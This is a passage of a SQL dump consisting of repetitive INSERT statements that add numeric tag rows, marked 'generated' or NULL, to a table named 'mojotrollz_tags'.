429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179505, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179505, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179505, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179506, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179506, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179506, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179506, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179507, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179508, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179509, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179510, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179511, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179511, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179511, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179511, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179513, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179516, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179516, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179516, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179516, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179517, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179517, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179517, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179517, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179526, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179526, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179526, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179526, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179528, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179528, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179528, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179528, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179532, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179532, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179532, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179532, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179533, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179533, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179533, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179533, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179544, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179544, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179544, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179544, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179545, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179545, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179545, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179545, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179547, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179547, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179547, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179547, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179549, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179549, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179549, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179549, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179550, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179550, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179550, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179550, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179551, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179552, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179553, 2, 1, 230, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179554, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179555, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179556, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179558, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179559, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179559, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179559, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179559, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179563, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179563, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179563, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179563, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179564, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179564, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179564, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179564, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179565, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179584, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179585, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179595, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179596, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179668, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179668, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179668, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179668, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179669, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179669, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179669, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179669, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179670, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179670, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179670, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179670, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179671, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179671, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179671, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179671, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179672, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179672, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179672, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179672, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179673, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179673, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179673, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179673, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179674, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179674, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179674, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179674, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179681, 2, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179681, 2, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179681, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179681, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179697, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179703, 2, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179703, 2, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179703, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179703, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179704, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179704, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179704, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179704, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179706, 2, 1, 449, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179707, 2, 1, 450, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179707, 2, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179707, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179707, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179724, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179725, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179726, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179727, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179728, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179729, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179730, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179731, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179732, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179733, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179734, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179735, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179736, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179737, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179738, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179739, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179740, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179741, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179742, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179743, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179744, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179747, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179748, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179749, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179750, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179751, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179752, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179753, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179754, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179755, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179756, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179757, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179758, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179759, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179760, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179761, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179762, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179763, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179764, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179765, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179766, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179767, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179768, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179769, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179770, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179771, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179778, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179779, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179780, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179781, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179782, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179784, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179784, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179784, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179784, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179804, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179804, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179804, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179804, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179826, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179827, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179828, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179830, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179830, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179830, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179830, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179831, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179831, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179831, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179831, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179844, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179846, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179862, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179863, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179864, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179871, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179871, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179871, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179871, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179874, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179875, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179876, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179877, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179878, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179879, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179880, 2, 1, 229, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179885, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179886, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179887, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179888, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179895, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179896, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179904, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179904, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179904, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179904, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179905, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179905, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179905, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179905, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179908, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179910, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179912, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179913, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179914, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179915, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179916, 2, 1, 489, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179916, 2, 2, 3277, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179916, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179916, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (179917, 2, 